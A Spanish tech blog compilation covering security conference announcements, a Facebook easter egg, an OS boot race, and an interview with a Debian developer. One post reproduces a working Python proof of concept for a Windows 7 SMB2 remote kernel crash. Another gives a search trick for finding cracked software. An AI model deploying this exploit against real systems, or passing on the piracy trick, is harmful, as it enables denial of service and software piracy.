Rincón Informático

Quizas muchos de nosotros estabamos esperando que en Octubre de este año se realizara el 4 Encuentro Internacional de Seguridad Informatica que se celebra en la ciudad de Manizales. Desafortunadamente  me entere que este año no habra EISI debido a falta de apoyo y patrocinadores.

Sin embargo, no todas las noticias son malas, visitando la pagina de la comunidad DragonJAR me doy cuenta que el proximo año habra EISI 4 cargado de mucho conocimiento, en este evento habran grandes ponentes asi como tambien  grandes  talleres y Workshops,   de la misma forma como se organizan los grandes eventos en seguridad (DEFCON, EKOPARTY..)

Segun DragonJAR varias cosas nuevas son:

• Tendremos 2 días capacitaciones altamente practicas con ponentes internacionales de la mas alta calidad
• Tendremos 3 días de charlas, en su mayoría workshops y talleres
• Durante los 3 días de charlas los asistentes al evento podrán disfrutar de una zona “Expo” donde podrán encontrar información de empresas, productos, servicios, rifas, exhibiciones, etc..
• Contaremos con un CTF durante los 3 días del evento, con una muy buena premiación (podrían añadirse mas retos en un futuro).

La asociación No cON Name, asociación sin ánimo de lucro fundada en Mallorca en 2002,reunió en 2010 a más de 300 expertos en seguridad informática de toda España en CosmoCaixa. El congreso se ha consolidado como uno de los encuentros de referencia del sur de Europa para técnicos del ámbito de la seguridad informática y busca la construcción de un foro abierto y libre donde converjan los conocimientos técnicos, el debate y la libre opinión.

La asociación anuncia que los días 16 y 17 de Septiembre de 2011 tendrá lugar en CosmoCaixa elcongreso No cON Name en su octava edición. El evento con más antigüedad en España,reunirá, a nuevas promesas, a expertos consolidados y profesionales en el campo de lainformática en general, redes telemáticas, programación o ingeniería de protección de software.La seguridad de equipos informáticos se ha convertido en la principal preocupación de empresas y particulares en los últimos tiempos. Por ello, la asociación hace un llamado anunciando la apertura de Propuesta de Ponencias o Call For Papers para todas aquellas personas que quieran presentar una ponencia enfocada tanto a análisis de sistemas inseguros,como a la aportación de ideas o proyectos que den un valor significativo a problemáticas deseguridad actuales y/o de futuro.

En esta edición, se estimulará la participación en proyectos de seguridad a través de concursosque la asociación creará para el propósito, donde se valorará el trabajo en equipos de múltiples disciplinas en el que potenciará la unidad del equipo y la solidaridad. Como puntos fuertes, el congreso se centrará en diversas áreas de la informática para el funcionamiento de los engranajes sociales, como por ejemplo los teléfonos móviles, la criticidad de la informática en dispositivos médicos que ayudan a salvar vidas humanas, los chips RFID y las tarjetas inteligentes, con usos tan diversos hoy en día como la identificación personal en los pasaportes, entidades bancarias o el acceso a instalaciones restringidas de alta seguridad, o los daños causados por una nueva clase de delincuentes en una nueva oleada decibercrimen.

La asociación tiene como uno de sus objetivos conseguir estimular una industria de la seguridad a través del intercambio y actualización del conocimiento entre los profesionales y expertos. Además, la asociación pretende, al mismo tiempo, llegar a los empresarios y ciudadanos para conseguir aumentar la concienciación sobre la importancia de la seguridad delos medios tecnológicos.

El plazo de presentación de propuestas para incluir un proyecto en el No cON Name 2011 ya está abierto y terminará el 31 de Mayo. La inscripción para los asistentes se abrirá 15 deMayo.

Leyendo mis feeds, me encuentro con este huevo de pascua en la aplicacion facebook (No se si sea correcto llamarle asi, pero en mi opinion eso es lo que es).

el truco consiste en presionar una secuencia de teclas (al mejor estilo de los trucos de los juegos de video), y  si tienes un poco de suerte, aparecerán en la pantalla  una linea de círculos rojos, la secuencia que deben presionar es la siguiente:

Arriba, Arriba, Abajo, Abajo, izquierda, derecha, izquierda, derecha, B, A, ENTER, derecha, arriba, y abajo

Si lo hacen con algo de rapidez y coordinación obtendrán algo como esto:

No se cual sera la utilidad de esta secuencia de teclas, sin embargo es algo muy curioso,  característica principal de los huevos de pascua, Aca en Rincon Informatico hemos hablado un poco sobre los huevos de pascua y algunos ejemplos en GNU/Linux.

Leyendo los feeds  me encuentro con esta noticia, se trata de un nuevo fallo en el sistema operativo de moda: Windows 7

Este bug permite  a los atacantes  bloquear la maquina victima lo cual  obliga a  reiniciar para tener otra vez control sobre la misma. En la pagina del investigador que dio a conocer el fallo (Laurent Gaffi)  explica  como funciona esta vulnerabilidad la cual se encuentra nuevamente en el protocolo SMB,  y afirma que no es posible la ejecucion de codigo remoto, ya que  el codigo de explotacion afecta al kernel de Windows 7 y Windows Server 2008 R2, disparando un bucle infinito.

Comparto el codigo de explotacion:

#win7-crash.py:
#Trigger a remote kernel crash on Win7 and server 2008R2 (infinite loop)
#Crash in KeAccumulateTicks() due to NT_ASSERT()/DbgRaiseAssertionFailure() caused by an #infinite loop.
#NO BSOD, YOU GOTTA PULL THE PLUG.
#To trigger it fast; from the target: \\this_script_ip_addr\BLAH , instantly crash
#Author: Laurent Gaffié
#

import SocketServer

packet = "\x00\x00\x00\x9a" # ---> length should be 9e not 9a..
"\xfe\x53\x4d\x42\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00"
"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x41\x00\x01\x00\x02\x02\x00\x00\x30\x82\xa4\x11\xe3\x12\x23\x41"
"\xaa\x4b\xad\x99\xfd\x52\x31\x8d\x01\x00\x00\x00\x00\x00\x01\x00"
"\x00\x00\x01\x00\x00\x00\x01\x00\xcf\x73\x67\x74\x62\x60\xca\x01"
"\xcb\x51\xe0\x19\x62\x60\xca\x01\x80\x00\x1e\x00\x20\x4c\x4d\x20"
"\x60\x1c\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x12\x30\x10\xa0\x0e"
"\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a"

class SMB2(SocketServer.BaseRequestHandler):

 def handle(self):

 print "Who:", self.client_address
 print "THANKS SDL"
 input = self.request.recv(1024)
 self.request.send(packet)
 self.request.close()

launch = SocketServer.TCPServer(('', 445),SMB2)# listen all interfaces port 445
launch.serve_forever()

Que raro que el protocolo SMB este presentando tantos problemas de seguridad,  ya que anteriormente  se han hecho publicos algunos fallos que afectan este mismo  protocolo como  la vulnerabilidad  BSOD  (pantallazo azul) que afectaba a Windows Vista, Windows 7 y Windows server 2008

Leyendo algunos tweets me encuentro en este sitio, un vídeo muy interesante el cual nos muestra una computación, entre Microsoft y  GNU/Linux  la competencia tiene 2 bandos por cada lado, en el lado del mal participan Windows Vista, y el recién salido del Horno  Windows 7, mientras que por GNU/Linux participan Ubuntu 9.04 y el nuevo consentido Ubuntu 9.10

La idea del reto es bastante sencillo, el primero sistema operativo en arrancar… ¿Quien ganara? Hagan sus apuestas!!!!

navegando con la red, me encuentro con un truco muy curioso el cual nos brinda la posibilidad de usar el poder de google para buscar software con medicina incluida, esto quiere decir, que si lanzamos una busqueda personalizada  esta nos arrojara muchos enlaces para descargar, software con el serial, crack o keygen incluido.   Para lograr esto, solo basta con buscar en google de la siguiente manera:

94fbr y el nombre del programa.

Un ejemplo:

Es muy util cuando aquellos que usan software privativo, necesitan descargar la aplicacion con  la medicina incluida.

Nota: Rincon Informatico, en ningun momento promueve  la pirateria de software,  esa accion es un delito, mejor sientete libre y usa Software Libre

Siguiendo con la iniciativa de entrevistar a  varios de los ponentes del tercer Encuentro Internacional de Seguridad Informatica (EISI 3), llego el turno de Luis Uribe,mas conocido como Acme un Linuxero, defensor del Software Libre y aspirante a desarrollador del proyecto Debian, esperamos que les guste la entrevista y que conozcan un poco mas de esta gran persona:

RI:¿Por qué Acme?

Acme: El nick viene de los tiempos de irc por alla en el 98, y se quedó en algunos servicios de correo. No recuerdo porque lo escogí, pero si se que es más complicado cambiar el nick que escoger uno nuevo.

Acme:Si te refieres a mis estudios, son varios e incompletos: Yo quiero terminar la carrera pero en la universidad no me han dejado salir. El resto ha sido iniciativa propia: muchos libros de programación, listas de correo, blogs, amigos geeks, etc.

Hay dos cosas que mi experiencia me ha enseñado:

- Un título universitario no es garantía de que sepas.

- En la mayoría de empresas o paises, un título universitario así sea de la universidad de la esquina, es muy útil para acceder a becas, cursos, viajes permisos de trabajo y mejores ofertas.

Entonces: hay que graduarse e investigar mucho por fuera.

RI: ¿Por qué software libre?

Acme: Al principio fué por razones técnicas, una plataforma como MS Windows no me permitía hacer lo que yo quería, es muy limitada y restrictiva con el usuario.

Pero después de conocer la filosofía del Software Libre, me di cuenta que estaba de acuerdo con ella (y la venia practicando hace un tiempo), así que fue el complemento ideal.

Obviamente uso software libre o privativo cuando es necesario, pero prefiero no pasarme al lado oscuro de la fuerza.

Acme: Si avanza pero muy poco, creo que necesitamos más lideres y menos personas esperando a colaborar. La mejor forma de colaborar es liderando un proyecto
Un actor importante en paises como Ecuador y Venezuela, ha sido el gobierno, independendientemente de colores y banderas, no se puede negar que políticas estatales le dan un empujon al uso de Software Libre.

Debian. Una configuración normal permite trabajar a un usuario de internet, oficina y juegos. La he probado en casa y entornos de oficina y no me presenta problemas, el usuario perezoso es el que le encuentra problemas a la distribución, y eso va a pasar siempre aunque uses Ubuntu, Debian o cualquier Windows.

Otro tema es que si tratas al usuario como idiota, siempre lo va a ser.

Acme: Quisiera verlo más reconocido por los usuarios, que comprendan el tema de las libertades y porque no le deberíamos entregar nuestros datos a una empresa.

Acme: Un par de tatuajes, más compromiso con el proyecto Debian, un par de viajes, muchas cervezas, pero no se en que orden. Hay muchas ideas pero ninguna con fecha definida. Por lo pronto estoy dedicado con alma, vida y sombrero a mi trabajo actual en Sisfo.

RI: ¿MySql o Postgres?

Acme: Los dos, casi siempre el problema no es del motor de la base de datos sino de un mal diseño de tablas, pocos recursos de máquina y consultas mal realizadas.

GNU/Linux, Debian específicamente. No he probado Open Solaris aún.

Acme: Club Colombia . Aunque prefiero el Jack Daniels y/o Smirnoff.

Muchas gracias a Luis por haber contestado muy amablemente las preguntas,  para los que desean mas informacion pueden visitar la pagina personal de acme, haciendo click aqui